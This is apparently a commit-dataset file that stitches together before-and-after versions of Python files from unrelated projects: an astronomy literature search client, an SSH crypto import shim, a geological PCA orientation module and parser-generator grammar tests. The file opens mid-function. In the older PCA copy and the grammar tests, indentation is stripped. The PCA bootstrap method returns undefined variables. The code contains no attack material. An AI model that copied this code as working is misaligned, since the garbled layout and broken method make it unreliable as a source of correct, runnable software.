        self.TOKEN = os.environ.get('ADS_DEV_KEY', None)
        if self.TOKEN is not None:
            return self.TOKEN
        token_file = os.path.expanduser(os.path.join('~', '.ads', 'dev_key'))
        try:
            with open(token_file) as f:
                self.TOKEN = f.read().strip()
            return self.TOKEN
        except IOError:
            # BUG FIX: the environment variable consulted above is
            # ADS_DEV_KEY, not API_DEV_KEY — the message must match.
            raise RuntimeError('No API token found! Get yours from: ' +
                               'https://ui.adsabs.harvard.edu/#user/settings/token ' +
                               'and store it in the ADS_DEV_KEY environment variable.')


ADS = ADSClass()
Fix failing test
# Licensed under a 3-clause BSD style license - see LICENSE.rst
"""
Module to search the SAO/NASA Astrophysics Data System
:author: Magnus Persson <magnusp@vilhelm.nu>
"""
import os
from astropy.table import Table
from astropy.extern.six.moves.urllib.parse import quote as urlencode
from ..query import BaseQuery
from ..utils import async_to_sync
from ..utils.class_or_instance import class_or_instance
from .utils import _get_data_from_xml
from . import conf
from xml.dom import minidom
__all__ = ['ADS', 'ADSClass']
@async_to_sync
class ADSClass(BaseQuery):
    """Query interface for the SAO/NASA Astrophysics Data System (ADS)."""

    SERVER = conf.server
    QUERY_SIMPLE_PATH = conf.simple_path
    TIMEOUT = conf.timeout
    ADS_FIELDS = conf.adsfields
    NROWS = conf.nrows
    NSTART = conf.nstart
    TOKEN = conf.token

    QUERY_SIMPLE_URL = SERVER + QUERY_SIMPLE_PATH

    def __init__(self, *args):
        """ set some parameters """
        super(ADSClass, self).__init__()

    @class_or_instance
    def query_simple(self, query_string, get_query_payload=False,
                     get_raw_response=False, cache=True):
        """
        Basic query. Uses a string and the ADS generic query.

        Parameters
        ----------
        query_string : str
            Free-form ADS query string.
        get_query_payload : bool
            If True, return the request URL instead of performing the query.
        get_raw_response : bool
            If True, return the raw ``requests`` response object.
        cache : bool
            Whether to cache the HTTP response.
        """
        request_string = self._args_to_url(query_string)
        request_fields = self._fields_to_url()
        request_rows = self._rows_to_url(self.NROWS, self.NSTART)
        request_url = self.QUERY_SIMPLE_URL + request_string + request_fields + request_rows
        # primarily for debug purposes, but also useful if you want to send
        # someone a URL linking directly to the data
        if get_query_payload:
            return request_url
        response = self._request(method='GET', url=request_url,
                                 headers={'Authorization': 'Bearer ' + self._get_token()},
                                 timeout=self.TIMEOUT, cache=cache)
        response.raise_for_status()
        if get_raw_response:
            return response
        # parse the XML response into AstroPy Table
        resulttable = self._parse_response(response.json())
        return resulttable

    def _parse_response(self, response):
        """Convert the JSON payload of an ADS response into an astropy Table.

        Raises ``RuntimeError`` when the query matched no documents.
        """
        try:
            response['response']['docs'][0]['bibcode']
        except IndexError:
            raise RuntimeError('No results returned!')
        # get the list of hits
        hitlist = response['response']['docs']
        t = Table()
        # Grab the various fields and put into AstroPy table
        for field in self.ADS_FIELDS:
            tmp = _get_data_from_xml(hitlist, field)
            t[field] = tmp
        return t

    def _args_to_url(self, query_string):
        # convert arguments to a valid requests payload
        # i.e. a dictionary
        request_string = 'q=' + urlencode(query_string)
        return request_string

    def _fields_to_url(self):
        # comma-separated list of fields to request
        request_fields = '&fl=' + ','.join(self.ADS_FIELDS)
        return request_fields

    def _rows_to_url(self, nrows=10, nstart=0):
        # paging parameters: number of rows and starting offset
        request_rows = '&rows=' + str(nrows) + '&start=' + str(nstart)
        return request_rows

    def _get_token(self):
        """
        Try to get token from the places Andy Casey's python ADS client expects it, otherwise return an error
        """
        if self.TOKEN is not None:
            return self.TOKEN
        self.TOKEN = os.environ.get('ADS_DEV_KEY', None)
        if self.TOKEN is not None:
            return self.TOKEN
        token_file = os.path.expanduser(os.path.join('~', '.ads', 'dev_key'))
        try:
            with open(token_file) as f:
                self.TOKEN = f.read().strip()
            return self.TOKEN
        except IOError:
            # BUG FIX: the environment variable consulted above is
            # ADS_DEV_KEY, not API_DEV_KEY — the message must match.
            raise RuntimeError('No API token found! Get yours from: ' +
                               'https://ui.adsabs.harvard.edu/#user/settings/token ' +
                               'and store it in the ADS_DEV_KEY environment variable.')


ADS = ADSClass()
|
# Copyright (c) 2014-2015 by Ron Frederick <ronf@timeheart.net>.
# All rights reserved.
#
# This program and the accompanying materials are made available under
# the terms of the Eclipse Public License v1.0 which accompanies this
# distribution and is available at:
#
# http://www.eclipse.org/legal/epl-v10.html
#
# Contributors:
# Ron Frederick - initial implementation, API, and documentation
"""A shim for accessing cryptographic primitives needed by asyncssh"""
import importlib

from .cipher import register_cipher, lookup_cipher

# BUG FIX: Curve25519 support is optional — its extra dependencies may be
# missing, in which case importing this package must not fail. Let the
# import fail softly; the name Curve25519DH is simply not exported then.
try:
    from .curve25519 import Curve25519DH
except ImportError:
    pass

from . import chacha

# Probe for the two supported crypto backends without importing them yet.
pyca_available = importlib.find_loader('cryptography')
pycrypto_available = importlib.find_loader('Crypto')

if pyca_available:
    from . import pyca

if pycrypto_available:
    from . import pycrypto

# Prefer the pyca/cryptography public-key implementations when available,
# falling back to PyCrypto; fail loudly when neither backend exists.
if pyca_available:
    from .pyca.dsa import DSAPrivateKey, DSAPublicKey
    from .pyca.rsa import RSAPrivateKey, RSAPublicKey
elif pycrypto_available:
    from .pycrypto.dsa import DSAPrivateKey, DSAPublicKey
    from .pycrypto.rsa import RSAPrivateKey, RSAPublicKey
else:
    raise ImportError('No suitable crypto library found.')
Allow Curve25519DH import to fail in crypto package
With the refactoring to avoid pylint warnings, a problem was introduced
in importing the crypto module when the curve25519 dependencies were
unavailable. This commit fixes that problem.
# Copyright (c) 2014-2015 by Ron Frederick <ronf@timeheart.net>.
# All rights reserved.
#
# This program and the accompanying materials are made available under
# the terms of the Eclipse Public License v1.0 which accompanies this
# distribution and is available at:
#
# http://www.eclipse.org/legal/epl-v10.html
#
# Contributors:
# Ron Frederick - initial implementation, API, and documentation
"""A shim for accessing cryptographic primitives needed by asyncssh"""
import importlib

from .cipher import register_cipher, lookup_cipher

# Curve25519 support is optional; its dependencies may be unavailable,
# in which case the name Curve25519DH is simply not exported.
try:
    from .curve25519 import Curve25519DH
except ImportError:
    pass

from . import chacha

# Probe for the two supported crypto backends without importing them yet.
pyca_available = importlib.find_loader('cryptography')
pycrypto_available = importlib.find_loader('Crypto')

if pyca_available:
    from . import pyca

if pycrypto_available:
    from . import pycrypto

# Prefer pyca/cryptography for the public-key types, then PyCrypto;
# fail loudly when neither backend is installed.
if pyca_available:
    from .pyca.dsa import DSAPrivateKey, DSAPublicKey
    from .pyca.rsa import RSAPrivateKey, RSAPublicKey
elif pycrypto_available:
    from .pycrypto.dsa import DSAPrivateKey, DSAPublicKey
    from .pycrypto.rsa import RSAPrivateKey, RSAPublicKey
else:
    raise ImportError('No suitable crypto library found.')
|
# -*- coding: utf-8 -*-
from __future__ import division
import numpy as N
from scipy.sparse import bsr_matrix
from scipy.linalg import lu
from scipy.sparse.linalg import svds
from itertools import chain
from seaborn.algorithms import bootstrap
from ..coordinates import centered
from .base import BaseOrientation, rotation
from ..error.ellipse import ellipse
from ..geom.util import dot
from ..geom.vector import vector
from ..geom.conics import conic
def augment(matrix):
    """Embed *matrix* in the upper-left corner of an identity matrix one
    row and one column larger (affine augmentation)."""
    rows, cols = matrix.shape
    out = N.identity(rows + 1)
    out[:rows, :cols] = matrix
    return out
def augment_vector(vec):
    """Append a homogeneous coordinate (1) to the 1-d vector *vec*."""
    return N.concatenate((vec, [1]))
def rotate_tensor(tensor, transform):
    """
    Transforms a tensor by an affine transform
    (conjugation: T' = A · T · Aᵀ).
    """
    rotated = dot(transform, tensor, transform.T)
    return rotated
def compose_affine(*transforms):
    """
    Returns a composite of several affine transformations,
    applied in the order given (the first transform listed
    is applied first).

    BUG FIX: ``reduce`` is no longer a builtin on Python 3; it must be
    imported from ``functools`` (where it also lives on Python 2.6+).
    """
    from functools import reduce
    return reduce(N.dot, reversed(transforms))
def normalize(v):
    """Return *v* scaled to unit length (2-norm)."""
    length = N.linalg.norm(v)
    return v / length
def vector_angle(v1, v2):
    """Return the angle in radians between vectors *v1* and *v2*."""
    # Scale both vectors to unit length (inlined from the normalize helper)
    u1 = v1 / N.linalg.norm(v1)
    u2 = v2 / N.linalg.norm(v2)
    return N.arccos(N.dot(u1, u2.T))
## magnitude of vector (by row)
# 2-norm taken along axis 1, i.e. one magnitude per row of x
norm = lambda x: N.linalg.norm(x,2,1)
def axis_transform(pca_axes):
    """
    Creates an affine transformation matrix to
    rotate data in PCA axes into Cartesian plane
    """
    source = N.identity(3)
    target = pca_axes
    # Find inverse transform for forward transform
    #   y = M x  ->  M = y (x)^(-1)
    # Least squares is more general than needed here (the source frame
    # is the identity), but mirrors the general-case computation.
    matrix, _, _, _ = N.linalg.lstsq(source, target)
    return matrix
def test_SVD(pca):
    """
    Function to test the validity of singular
    value decomposition by reconstructing original
    data.
    """
    # U · Σ · V must reproduce the (centered) input array exactly
    _ = pca
    rec = N.dot(_.U,N.dot(_.sigma,_.V))
    assert N.allclose(_.arr,rec)
def covariance_matrix(self):
    # NOTE(review): this function takes `self` but is defined at module
    # level — it looks like a detached method; PCAOrientation defines its
    # own `covariance_matrix` property instead. Verify whether this is
    # still referenced anywhere.
    """
    Constructs the covariance matrix of
    input data from
    the singular value decomposition. Note
    that this is different than a covariance
    matrix of residuals, which is what we want
    for calculating fit errors.

    Using SVD output to compute covariance matrix

    X=UΣV⊤

    XX⊤XX⊤=(UΣV⊤)(UΣV⊤)⊤=(UΣV⊤)(VΣU⊤)

    V is an orthogonal matrix (V⊤V=I),
    covariance matrix of input data: XX⊤=UΣ2U⊤

    Because the axes represent identity in the
    PCA coordinate system, the PCA major axes
    themselves represent an affine transformation
    matrix from PCA to Cartesian space
    """
    a = N.dot(self.U,self.sigma)
    cv = N.dot(a,a.T)
    # This yields the covariance matrix in Cartesian
    # coordinates
    return cv
class PCAOrientation(BaseOrientation):
""" Gets the axis-aligned principle components
of the dataset.
"""
def __init__(self, arr):
""" Requires an object implementing the
Attitude interface
"""
# For principal components, data needs
# to be pre-processed to have zero mean
self.arr = centered(arr)
# Note: it might be desirable to further
# standardize the data by dividing by
# the standard deviation as such
# self.arr /= self.arr.std(axis=0)
# but this is not clear. Not dividing by
# std leaves us with an eigen-analysis of
# the *covariance matrix*, while dividing
# by it leaves us with an eigen-analysis
# of the *correlation matrix*
self.n = len(self.arr)
#ratio = self.n/1e4
#if ratio > 2:
# r = N.floor(ratio)
# self.n /= r
# self.arr = self.arr[::r,:]
res = N.linalg.svd(self.arr,
full_matrices=False)
self.U, s, V = res
self.singular_values = s
self.axes = V
self.sigma = N.diag(self.singular_values)
self.V = V
# Similar to normal vector, but not rotated into
# Cartesian frame
self.offset = N.cross(self.sigma[0],self.sigma[1])
self.normal = self.axes[2]
self._vertical = N.array([0,0,1])
self.strike = N.cross(self.normal,self._vertical)
self.dip_dr = normalize(N.cross(self.strike,self.normal))
def whitened(self):
"""
Returns a 'whitened' or decorrelated version of
the input data, where variances along all axes
are rescaled to 1 (i.e. the covariance matrix
becomes an identity matrix).
"""
return N.dot(self.U,self.V.T)
def rotated(self):
"""
Returns a dataset 'despun' so that
it is aligned with the princpal
axes of the dataset.
"""
return N.dot(self.U,self.sigma)
def residuals(self):
"""
Returns residuals of fit against all
three data axes (singular values 1, 2,
and 3). This takes the form of data along
singular axis 3 (axes 1 and 2 define the plane)
"""
_ = self.rotated()
_[:,-1] = 0
_ = N.dot(_,self.axes)
return self.arr - _
@property
def covariance_matrix(self):
"""
Constructs the covariance matrix from PCA
residuals
"""
return self.sigma**2/(self.n-1)
@property
def explained_variance(self):
"""
Proportion of variance that is explained by the
first two principal components (which together
represent the planar fit). Analogous to R^2 of
linear least squares.
"""
v = N.diagonal(self.covariance_matrix)
return v[0:2].sum()/v.sum()
@property
def coefficients(self):
return self.axes[2]
@property
def azimuth(self):
c = self.coefficients
return N.arctan2(c[0],c[1])
@property
def slope(self):
_ = self.coefficients
mag = N.linalg.norm(_)
return N.arccos(_[2]/mag)
def strike_dip(self):
""" Computes strike and dip from a normal vector.
Results are usually exactly the same as LLSQ
in strike (to a few decimal places) and close in dip.
Sometimes, dips are greater by as much as 45 degrees,
reflecting inclusion of errors in x-y plane.
"""
n = self.axes[2]
r = N.linalg.norm(n)
strike = N.degrees(N.arctan2(n[0],n[1]))-90
dip = N.degrees(N.arccos(n[2]/r))
# Since PCA errors are not pinned to the XYZ plane,
# we need to make sure our results are in the
# right quadrant.
if dip > 90:
dip = 180 - dip
strike += 180
return strike, dip
def as_conic(self, level=1):
if dot(self.axes[2],vector(0,0,1)) < 0:
self.axes *= -1
cov = self.covariance_matrix
idx = N.diag_indices(3)
ell = N.identity(4)
ell[idx] = 1/cov[idx]*level**2 #cov*level**2#
ell[3,3] = -1
ell = conic(ell)
# Translate ellipse along 3rd major axis
ell = ell.translate(self.offset)
# Rotate ellipse matrix into cartesian
# plane
R = augment(self.axes)
return ell.transform(R)
def as_hyperbola(self, rotated=False):
"""
Hyperbolic error area
"""
pca_res = 1/(self.singular_values/4)#((self.singular_values/2)**2)
#pca_res = self.singular_values
arr = N.identity(4)
arr[0,0] = pca_res[0]
arr[1,1] = pca_res[1]
arr[2,2] = -pca_res[2]
arr[3,3] = -1
return conic(arr)
def _ellipse(self, level=1):
ell = self.as_conic(level=level)
con, matrix, center = ell.projection()
ax = con.major_axes()
# Rotate major axes into 3d space
axs_ = N.append(ax,N.zeros((2,1)),axis=1)
axs = dot(axs_,matrix[:3])
u = N.linspace(0,2*N.pi,1000)
# Get a bundle of vectors defining cone
# which circumscribes ellipsoid
angles = N.array([N.cos(u),N.sin(u)]).T
# Turn into vectors
return dot(angles,axs),center
def plane_errors(self, **kwargs):
data, center = self._ellipse(**kwargs)
data += center
v = N.cross(data,center)
#2v = N.cross(ax,data)
r = N.linalg.norm(v,axis=1)
plunge = N.arcsin(v[:,2]/r)
trend = N.arctan2(v[:,0],v[:,1])
v = N.cross(center,data)
#v = N.cross(ax,data)
r = N.linalg.norm(v,axis=1)
plunge2 = N.arcsin(v[:,2]/r)
trend2 = N.arctan2(v[:,0],v[:,1])
return ((N.pi+trend,plunge),(N.pi+trend2,plunge2))
def error_ellipse(self, spherical=True, vector=False, level=1):
data,center = self._ellipse(level)
data += center
r = N.linalg.norm(data,axis=1)
plunge = N.arcsin(data[:,2]/r)
trend = N.arctan2(data[:,0],data[:,1])
#m = N.linalg.norm(axs,axis=1)
#c = N.linalg.norm(center)
#a_dist = [N.degrees(N.arctan2(i,c)) for i in m]
#if spherical:
# return e + N.array([self.azimuth+N.pi/2,0])
return (trend,plunge)
def bootstrap(self):
reg_func = lambda arr: N.linalg.svd(arr,full_matrices=False)[2][2]
beta_boots = bootstrap(self.arr, func=reg_func)
return yhat, yhat_boots
Updated method of computing hyperbolic errors
# -*- coding: utf-8 -*-
from __future__ import division
import numpy as N
from scipy.sparse import bsr_matrix
from scipy.linalg import lu
from scipy.sparse.linalg import svds
from itertools import chain
from seaborn.algorithms import bootstrap
from ..coordinates import centered
from .base import BaseOrientation, rotation
from ..error.ellipse import ellipse
from ..geom.util import dot
from ..geom.vector import vector
from ..geom.conics import conic
def augment(matrix):
size = matrix.shape
_ = N.identity(size[0]+1)
_[:size[0],:size[1]] = matrix
return _
def augment_vector(vec):
return N.append(vec,[1],axis=0)
def rotate_tensor(tensor,transform):
"""
Transforms a tensor by an affine transform
"""
return dot(transform, tensor, transform.T)
def compose_affine(*transforms):
    """
    Returns a composite of several affine transformations,
    applied in the order given (the first transform listed
    is applied first).

    BUG FIX: ``reduce`` is no longer a builtin on Python 3; it must be
    imported from ``functools`` (where it also lives on Python 2.6+).
    """
    from functools import reduce
    return reduce(N.dot, reversed(transforms))
def normalize(v):
return v/N.linalg.norm(v)
def vector_angle(v1,v2):
_ = N.dot(normalize(v1),normalize(v2).T)
return N.arccos(_)
## magnitude of vector (by row)
norm = lambda x: N.linalg.norm(x,2,1)
def axis_transform(pca_axes):
"""
Creates an affine transformation matrix to
rotate data in PCA axes into Cartesian plane
"""
from_ = N.identity(3)
to_ = pca_axes
# Find inverse transform for forward transform
# y = M x -> M = y (x)^(-1)
# We don't need to do least-squares since
# there is a simple transformation
trans_matrix = N.linalg.lstsq(from_,to_)[0]
return trans_matrix
def test_SVD(pca):
"""
Function to test the validity of singular
value decomposition by reconstructing original
data.
"""
_ = pca
rec = N.dot(_.U,N.dot(_.sigma,_.V))
assert N.allclose(_.arr,rec)
def covariance_matrix(self):
"""
Constructs the covariance matrix of
input data from
the singular value decomposition. Note
that this is different than a covariance
matrix of residuals, which is what we want
for calculating fit errors.
Using SVD output to compute covariance matrix
X=UΣV⊤
XX⊤XX⊤=(UΣV⊤)(UΣV⊤)⊤=(UΣV⊤)(VΣU⊤)
V is an orthogonal matrix (V⊤V=I),
covariance matrix of input data: XX⊤=UΣ2U⊤
Because the axes represent identity in the
PCA coordinate system, the PCA major axes
themselves represent an affine transformation
matrix from PCA to Cartesian space
"""
a = N.dot(self.U,self.sigma)
cv = N.dot(a,a.T)
# This yields the covariance matrix in Cartesian
# coordinates
return cv
class PCAOrientation(BaseOrientation):
    """ Gets the axis-aligned principle components
    of the dataset.
    """
    def __init__(self, arr):
        """ Requires an object implementing the
        Attitude interface
        """
        # For principal components, data needs
        # to be pre-processed to have zero mean
        self.arr = centered(arr)
        # Note: it might be desirable to further
        # standardize the data by dividing by
        # the standard deviation as such
        # self.arr /= self.arr.std(axis=0)
        # but this is not clear. Not dividing by
        # std leaves us with an eigen-analysis of
        # the *covariance matrix*, while dividing
        # by it leaves us with an eigen-analysis
        # of the *correlation matrix*
        self.n = len(self.arr)  # number of observations
        #ratio = self.n/1e4
        #if ratio > 2:
        #    r = N.floor(ratio)
        #    self.n /= r
        #    self.arr = self.arr[::r,:]
        res = N.linalg.svd(self.arr,
            full_matrices=False)
        self.U, s, V = res
        self.singular_values = s
        # Rows of V are the principal axes of the dataset
        self.axes = V
        self.sigma = N.diag(self.singular_values)
        self.V = V
        # Similar to normal vector, but not rotated into
        # Cartesian frame
        self.offset = N.cross(self.sigma[0],self.sigma[1])
        self.normal = self.axes[2]
        self._vertical = N.array([0,0,1])
        self.strike = N.cross(self.normal,self._vertical)
        self.dip_dr = normalize(N.cross(self.strike,self.normal))
    def whitened(self):
        """
        Returns a 'whitened' or decorrelated version of
        the input data, where variances along all axes
        are rescaled to 1 (i.e. the covariance matrix
        becomes an identity matrix).
        """
        return N.dot(self.U,self.V.T)
    def rotated(self):
        """
        Returns a dataset 'despun' so that
        it is aligned with the princpal
        axes of the dataset.
        """
        return N.dot(self.U,self.sigma)
    def residuals(self):
        """
        Returns residuals of fit against all
        three data axes (singular values 1, 2,
        and 3). This takes the form of data along
        singular axis 3 (axes 1 and 2 define the plane)
        """
        # Zero the component along the third (smallest) axis,
        # rotate back into Cartesian space, and subtract from input
        _ = self.rotated()
        _[:,-1] = 0
        _ = N.dot(_,self.axes)
        return self.arr - _
    @property
    def covariance_matrix(self):
        """
        Constructs the covariance matrix from PCA
        residuals
        """
        return self.sigma**2/(self.n-1)
    @property
    def explained_variance(self):
        """
        Proportion of variance that is explained by the
        first two principal components (which together
        represent the planar fit). Analogous to R^2 of
        linear least squares.
        """
        v = N.diagonal(self.covariance_matrix)
        return v[0:2].sum()/v.sum()
    @property
    def coefficients(self):
        # Normal vector to the fitted plane (third principal axis)
        return self.axes[2]
    @property
    def azimuth(self):
        c = self.coefficients
        return N.arctan2(c[0],c[1])
    @property
    def slope(self):
        _ = self.coefficients
        mag = N.linalg.norm(_)
        return N.arccos(_[2]/mag)
    def strike_dip(self):
        """ Computes strike and dip from a normal vector.
        Results are usually exactly the same as LLSQ
        in strike (to a few decimal places) and close in dip.
        Sometimes, dips are greater by as much as 45 degrees,
        reflecting inclusion of errors in x-y plane.
        """
        n = self.axes[2]
        r = N.linalg.norm(n)
        strike = N.degrees(N.arctan2(n[0],n[1]))-90
        dip = N.degrees(N.arccos(n[2]/r))
        # Since PCA errors are not pinned to the XYZ plane,
        # we need to make sure our results are in the
        # right quadrant.
        if dip > 90:
            dip = 180 - dip
            strike += 180
        return strike, dip
    def as_conic(self, level=1):
        # Flip axes so the fitted normal points upward (+z)
        if dot(self.axes[2],vector(0,0,1)) < 0:
            self.axes *= -1
        cov = self.covariance_matrix
        idx = N.diag_indices(3)
        ell = N.identity(4)
        ell[idx] = 1/cov[idx]*level**2 #cov*level**2#
        ell[3,3] = -1
        ell = conic(ell)
        # Translate ellipse along 3rd major axis
        ell = ell.translate(self.offset)
        # Rotate ellipse matrix into cartesian
        # plane
        R = augment(self.axes)
        return ell.transform(R)
    def as_hyperbola(self, rotated=False):
        """
        Hyperbolic error area
        """
        # Build the quadric from inverse variances; the third (fit-normal)
        # axis gets the opposite sign, producing a hyperboloid rather than
        # an ellipsoid
        idx = N.diag_indices(3)
        _ = 1/self.covariance_matrix[idx]
        d = list(_)
        d[-1] *= -1
        arr = N.identity(4)*-1
        arr[idx] = d
        return conic(arr)
    def _ellipse(self, level=1):
        ell = self.as_conic(level=level)
        con, matrix, center = ell.projection()
        ax = con.major_axes()
        # Rotate major axes into 3d space
        axs_ = N.append(ax,N.zeros((2,1)),axis=1)
        axs = dot(axs_,matrix[:3])
        u = N.linspace(0,2*N.pi,1000)
        # Get a bundle of vectors defining cone
        # which circumscribes ellipsoid
        angles = N.array([N.cos(u),N.sin(u)]).T
        # Turn into vectors
        return dot(angles,axs),center
    def plane_errors(self, **kwargs):
        # Trend/plunge pairs for both senses of the error bound
        data, center = self._ellipse(**kwargs)
        data += center
        v = N.cross(data,center)
        #2v = N.cross(ax,data)
        r = N.linalg.norm(v,axis=1)
        plunge = N.arcsin(v[:,2]/r)
        trend = N.arctan2(v[:,0],v[:,1])
        v = N.cross(center,data)
        #v = N.cross(ax,data)
        r = N.linalg.norm(v,axis=1)
        plunge2 = N.arcsin(v[:,2]/r)
        trend2 = N.arctan2(v[:,0],v[:,1])
        return ((N.pi+trend,plunge),(N.pi+trend2,plunge2))
    def error_ellipse(self, spherical=True, vector=False, level=1):
        # Trend/plunge of points along the error ellipse boundary
        data,center = self._ellipse(level)
        data += center
        r = N.linalg.norm(data,axis=1)
        plunge = N.arcsin(data[:,2]/r)
        trend = N.arctan2(data[:,0],data[:,1])
        #m = N.linalg.norm(axs,axis=1)
        #c = N.linalg.norm(center)
        #a_dist = [N.degrees(N.arctan2(i,c)) for i in m]
        #if spherical:
        #    return e + N.array([self.azimuth+N.pi/2,0])
        return (trend,plunge)
    def bootstrap(self):
        # NOTE(review): `yhat` and `yhat_boots` are never defined in this
        # method, so calling it raises NameError. Presumably the return
        # should be derived from `beta_boots` — needs fixing.
        reg_func = lambda arr: N.linalg.svd(arr,full_matrices=False)[2][2]
        beta_boots = bootstrap(self.arr, func=reg_func)
        return yhat, yhat_boots
|
from __future__ import unicode_literals
import pytest
from textx.metamodel import metamodel_from_str
from textx.exceptions import TextXSyntaxError
def test_modifier_separator_zeroormore():
model = """
Rule:
("a"|"b")*[','];
"""
metamodel = metamodel_from_str(model)
model = metamodel.model_from_str("a,b, a, b")
assert model
def test_modifier_separator_oneormore():
model = """
Rule:
("a"|"b")+[','];
"""
metamodel = metamodel_from_str(model)
model = metamodel.model_from_str("a,b, a, b")
assert model
with pytest.raises(TextXSyntaxError):
# Must be separated with comma
metamodel.model_from_str("a b")
with pytest.raises(TextXSyntaxError):
# At least one must be matched
metamodel.model_from_str("")
def test_modifier_separator_optional():
model = """
Rule:
("a"|"b")?[','];
"""
with pytest.raises(TextXSyntaxError):
# Modifiers are not possible for ? operator
metamodel_from_str(model)
def test_modifier_separator_unordered_group():
model = """
Rule:
("a" "b" "c")#[','];
"""
metamodel = metamodel_from_str(model)
model = metamodel.model_from_str("a, b, c")
assert model
model = metamodel.model_from_str("c, a, b")
assert model
with pytest.raises(TextXSyntaxError):
metamodel.model_from_str("a, c b")
with pytest.raises(TextXSyntaxError):
metamodel.model_from_str("a, c, a, b")
with pytest.raises(TextXSyntaxError):
metamodel.model_from_str(",a, c, b")
with pytest.raises(TextXSyntaxError):
metamodel.model_from_str("a, c, b, ")
with pytest.raises(TextXSyntaxError):
metamodel.model_from_str("a, c, ,b ")
def test_assignment_modifier_separator_zeroormore():
model = """
Rule:
a*=AorB[','];
AorB:
"a"|"b";
"""
metamodel = metamodel_from_str(model)
model = metamodel.model_from_str("a,b, a")
# 3 AorBs must be matched
assert len(model.a) == 3
assert model.a[1] == 'b'
def test_assignment_modifier_separator_oneormore():
model = """
Rule:
a+=AorB[','];
AorB:
"a"|"b";
"""
metamodel = metamodel_from_str(model)
model = metamodel.model_from_str("a,b, a")
# 3 AorBs must be matched
assert len(model.a) == 3
assert model.a[1] == 'b'
def test_assignment_modifier_separator_optional():
"""
Modifiers are not allowed for ?= assignment.
"""
model = """
Rule:
a?=AorB[','];
AorB:
"a"|"b";
"""
with pytest.raises(TextXSyntaxError):
metamodel_from_str(model)
def test_assignment_modifier_separator_plain():
"""
Modifiers are not allowed for plain assignment.
"""
model = """
Rule:
a=AorB[','];
AorB:
"a"|"b";
"""
with pytest.raises(TextXSyntaxError):
metamodel_from_str(model)
def test_modifier_eolterm_zeroormore():
model = """
Rule:
'first'
INT*[eolterm] '123456';
"""
metamodel = metamodel_from_str(model)
# After 'first' and before newline must
# be one or more integers
with pytest.raises(TextXSyntaxError):
model = metamodel.model_from_str("""
first
34 56 88 65
123456
""")
# When newline is found matching integers
# finishes and than a '123456' is matched
model = metamodel.model_from_str("""
first 34 56 88 65
123456
""")
assert model
def test_modifier_eolterm_oneormore():
model = """
Rule:
'first'
INT+[eolterm] '123456';
"""
metamodel = metamodel_from_str(model)
# After 'first' and before newline must
# be one or more integers
with pytest.raises(TextXSyntaxError):
model = metamodel.model_from_str("""
first
34 56 88 65
123456
""")
# When newline is found matching integers
# finishes and than a '123456' is matched
model = metamodel.model_from_str("""
first 34 56 88 65
123456
""")
assert model
def test_multiple_modifiers():
"""
Multiple modifier may be specified separated with space.
"""
model = """
Rule:
'first'
INT+[eolterm ','] '123456';
"""
metamodel = metamodel_from_str(model)
# After 'first' and before newline must
# be one or more integers separated with comma
with pytest.raises(TextXSyntaxError):
model = metamodel.model_from_str("""
first
34 56 88 65
123456
""")
# When newline is found matching integers
# finishes and than a '123456' is matched
model = metamodel.model_from_str("""
first 34, 56, 88, 65
123456
""")
assert model
Test for unordered groups with separator and optionals.
from __future__ import unicode_literals
import pytest
from textx.metamodel import metamodel_from_str
from textx.exceptions import TextXSyntaxError
def test_modifier_separator_zeroormore():
model = """
Rule:
("a"|"b")*[','];
"""
metamodel = metamodel_from_str(model)
model = metamodel.model_from_str("a,b, a, b")
assert model
def test_modifier_separator_oneormore():
model = """
Rule:
("a"|"b")+[','];
"""
metamodel = metamodel_from_str(model)
model = metamodel.model_from_str("a,b, a, b")
assert model
with pytest.raises(TextXSyntaxError):
# Must be separated with comma
metamodel.model_from_str("a b")
with pytest.raises(TextXSyntaxError):
# At least one must be matched
metamodel.model_from_str("")
def test_modifier_separator_optional():
model = """
Rule:
("a"|"b")?[','];
"""
with pytest.raises(TextXSyntaxError):
# Modifiers are not possible for ? operator
metamodel_from_str(model)
def test_modifier_separator_unordered_group():
model = """
Rule:
("a" "b" "c")#[','];
"""
metamodel = metamodel_from_str(model)
model = metamodel.model_from_str("a, b, c")
assert model
model = metamodel.model_from_str("c, a, b")
assert model
with pytest.raises(TextXSyntaxError):
metamodel.model_from_str("a, c b")
with pytest.raises(TextXSyntaxError):
metamodel.model_from_str("a, c, a, b")
with pytest.raises(TextXSyntaxError):
metamodel.model_from_str(",a, c, b")
with pytest.raises(TextXSyntaxError):
metamodel.model_from_str("a, c, b, ")
with pytest.raises(TextXSyntaxError):
metamodel.model_from_str("a, c, ,b ")
def test_modifier_separator_unordered_group_with_optionals():
    """Unordered group (#) with a comma separator where one member is
    optional: mandatory members must each appear exactly once, in any
    order, separated by commas; the optional member may be omitted."""
    model = """
    Rule:
        ("a" "b"? "c")#[','];
    """
    metamodel = metamodel_from_str(model)
    model = metamodel.model_from_str("a, b, c")
    assert model
    # "b" is optional, so it may be left out entirely
    model = metamodel.model_from_str("c, a")
    assert model
    with pytest.raises(TextXSyntaxError):
        # missing separator between "c" and "b"
        metamodel.model_from_str("a, c b")
    with pytest.raises(TextXSyntaxError):
        # trailing separator with nothing after it
        metamodel.model_from_str("a, c, ")
    with pytest.raises(TextXSyntaxError):
        # member "a" repeated
        metamodel.model_from_str("a, c, a, b")
    with pytest.raises(TextXSyntaxError):
        # leading separator
        metamodel.model_from_str(",a, c, b")
    with pytest.raises(TextXSyntaxError):
        # trailing separator
        metamodel.model_from_str("a, c, b, ")
    with pytest.raises(TextXSyntaxError):
        # doubled separator
        metamodel.model_from_str("a, c, ,b ")
def test_assignment_modifier_separator_zeroormore():
model = """
Rule:
a*=AorB[','];
AorB:
"a"|"b";
"""
metamodel = metamodel_from_str(model)
model = metamodel.model_from_str("a,b, a")
# 3 AorBs must be matched
assert len(model.a) == 3
assert model.a[1] == 'b'
def test_assignment_modifier_separator_oneormore():
model = """
Rule:
a+=AorB[','];
AorB:
"a"|"b";
"""
metamodel = metamodel_from_str(model)
model = metamodel.model_from_str("a,b, a")
# 3 AorBs must be matched
assert len(model.a) == 3
assert model.a[1] == 'b'
def test_assignment_modifier_separator_optional():
"""
Modifiers are not allowed for ?= assignment.
"""
model = """
Rule:
a?=AorB[','];
AorB:
"a"|"b";
"""
with pytest.raises(TextXSyntaxError):
metamodel_from_str(model)
def test_assignment_modifier_separator_plain():
"""
Modifiers are not allowed for plain assignment.
"""
model = """
Rule:
a=AorB[','];
AorB:
"a"|"b";
"""
with pytest.raises(TextXSyntaxError):
metamodel_from_str(model)
def test_modifier_eolterm_zeroormore():
model = """
Rule:
'first'
INT*[eolterm] '123456';
"""
